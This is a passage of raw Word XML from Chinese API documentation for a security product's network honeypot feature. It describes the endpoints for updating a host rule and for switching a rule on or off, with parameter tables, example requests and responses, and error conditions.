    <w:p w14:paraId="687F8F06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="788"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5403"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="2F5F003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09EB858" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6412AF4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BDC2B0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="086BEC90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="493A4394" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A973443" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45BCCDB9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="772D14CF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17844AE7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FEA294E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3F5F6D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="293CD08F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D19D05F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="025B9EDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口状态，含义如下：-1:同步行中 1:同步成功 0:同步失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="253F3E7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064C8E17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F3AB92" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C09E81D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="341" w:name="_Toc115166243"/>
      <w:bookmarkStart w:id="342" w:name="更新单条规则"/>
      <w:bookmarkEnd w:id="340"/>
      <w:r>
        <w:t>更新单条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="341"/>
    </w:p>
    <w:p w14:paraId="631A85D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐更新主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8D52C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ACCB85" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B088E80"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54"/>
        <w:gridCol w:w="904"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3382"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="53D811D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24F8E88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="611BBC90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001DD342" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133E3085" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6CA229E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="233258A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D7FFD5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12280546" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="245F0727" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="732792EA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="242E4861" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9B7367" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA6F8CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CA3CE21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>端口列表（端口个数不能超过5个）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="503C0D6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADBD029" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD8C43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618AB83C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CAC418"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630"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1070"/>
        <w:gridCol w:w="2095"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5460702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AD18E94" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5457B701" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4414894A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62E3B33F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F265237" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12BB29BD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="313CF986" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B3D568F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B2E6D5C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>true:成功 false:失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C2CE21F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EB8672" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56918C51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C0F584" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>帐号</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>没有权限，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D97869F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则同步中不能更新，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0914480C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则禁用状态不能更新，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1CB65E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口参数为空，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D3553" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>端口数量大于5，会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464390B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="343" w:name="_Toc115166244"/>
      <w:bookmarkStart w:id="344" w:name="开关单条规则"/>
      <w:bookmarkEnd w:id="342"/>
      <w:r>
        <w:t>开关单条规则</w:t>
      </w:r>
      <w:bookmarkEnd w:id="343"/>
    </w:p>
    <w:p w14:paraId="29127A1E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口提供Linux/Windows网络蜜罐开启/关闭主机规则功能。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E3A3FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1731F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>PUT /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux,win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}/rule/enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E4EA1C"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54"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2467"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="657861F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8F6071D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117BE6AA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594CB670" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EFFC6BE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57B8A99E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5653B6DE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="649B56EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36630B6E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10BA576D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="714325AB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="624FF501" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="307702B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60AF76F9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="46742884" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>规则状态，0:开启 1:关闭</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38090988" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBF7C59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/detect/honeypot/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/rule/enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46124949" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46923F06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "flag": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388AA49" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>异常说明：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF99BF1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则主机不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE05C44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>规则不存在，则会抛出异常及相关提示</w:t>
      </w:r>
    </w:p>
